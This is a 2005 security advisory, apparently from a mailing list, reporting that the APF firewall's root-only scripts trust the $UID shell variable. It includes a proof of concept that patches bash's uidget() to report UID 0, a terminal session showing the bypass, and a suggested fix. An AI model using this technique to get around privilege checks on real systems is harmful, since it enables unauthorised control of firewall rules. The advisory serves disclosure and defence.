<<< Date Index >>>     <<< Thread Index >>>

SB2005002: pron to bypass APF checking uid(0) routine




=====================================================
SB2005002: pron to bypass APF checking uid(0) routine
-----------------------------------------------------

Date : 01-13-2005

Author : x90c@xxxxxxxxxxxxxxxx/~jyj9782


----- Affected Version ----- 

apf-0.9.4-7 ( current at this time )


----- Summary -----

APF is a policy based iptables firewall system designed for ease of use and
configuration. It employs a subset of features to satisfy the veteran
Linux user and the novice alike. Packaged in tar.gz and RPM formats, APF is
ideal for deployment in any linux server environment.
tarball From the website ( http://www.r-fx.org/apf.php ).

1) Smallest Flaw
When below PoC commands are executed, which allows localusers to bypass 
the (only can use root) checking. therefore maybe an malicous user will can 
free to use admin scripts(apf, firewall..) such as changing rules or 
start/stop deamon and so on..

it's very dangerous from smallest things.
but it might be didn't happen,, because this program has install.sh.
it contains of  "chmod 750 $INSPATH/firewall" .. but i can advise 
potentialities~


----- PoC -----

STEP 1) Patch your bash source (vi shell.c +1099) as below.
+ u = 0;
+ current_user.gid = 0;
+ current_user.euid = 0;
+ current_user.egid = 0;

-shell.c +1099-
static int
uidget ()
{
  uid_t u;

  u = 0;
  if (current_user.uid != u)
    {
      FREE (current_user.user_name);
      FREE (current_user.shell);
      FREE (current_user.home_dir);
      current_user.user_name = current_user.shell = current_user.home_dir = 
(char *)NULL;
    }
  current_user.uid = u;
  current_user.gid = 0;
  current_user.euid = 0;
  current_user.egid = 0;

  /* See whether or not we are running setuid or setgid. */
  return (current_user.uid != current_user.euid) ||
           (current_user.gid != current_user.egid);
}


STEP 2) run vulerable scripts only for root (0) using patched bash shell.

root@testbed:/home/s/apf-0.9.4-7# ls
CHANGELOG    README          apf.init    files       logrotate.d.apf
COPYING.GPL  README.antidos  cron.daily  install.sh
root@testbed:/home/s/apf-0.9.4-7# cd files
root@testbed:/home/s/apf-0.9.4-7/files# ls
VERSION            apf       deny_hosts.rules  extras     log.rules       
sysctl.rules
ad                 bt.rules  doc               firewall   main.rules      vnet
allow_hosts.rules  conf.apf  ds_hosts.rules    internals  preroute.rules
root@testbed:/home/s/apf-0.9.4-7/files# grep "UID" *
apf:if [ "$UID" != "0" ]; then
firewall:if [ "$UID" != "0" ]; then
root@testbed:/home/s/apf-0.9.4-7/files# 

i don't want to install and so i just only tested as below.

root@testbed:/tmp# ls -al b* f*
-rwxr-xr-x    1 pt       pt        2969870 2005-01-08 01:23 bash90
-rwxrwxr-x    1 root     root           24 2005-01-08 01:23 fake_firewall
root@testbed:/tmp# su pt
pt@testbed:/tmp$ id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
pt@testbed:/tmp$ echo $UID
1001
pt@testbed:/tmp$ ./bash90 
root@testbed:/tmp# echo $UID
0
root@testbed:/tmp# id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
root@testbed:/tmp# ./fake_firewall
1001
root@testbed:/tmp# exit
exit
pt@testbed:/tmp$ ./bash90 fake_firewall
0
pt@testbed:/tmp$


----- Solution -----

# cp /bin/id /firewall_path/secure_id
# chmod 700 /firewall_path/secure_id

and changed the sources to get uid by right above file..

or i recommend upgrade new release to you..






----- Credits -----
This smallest flaw was found by x90c(Kyong Joo, Jung) personaly.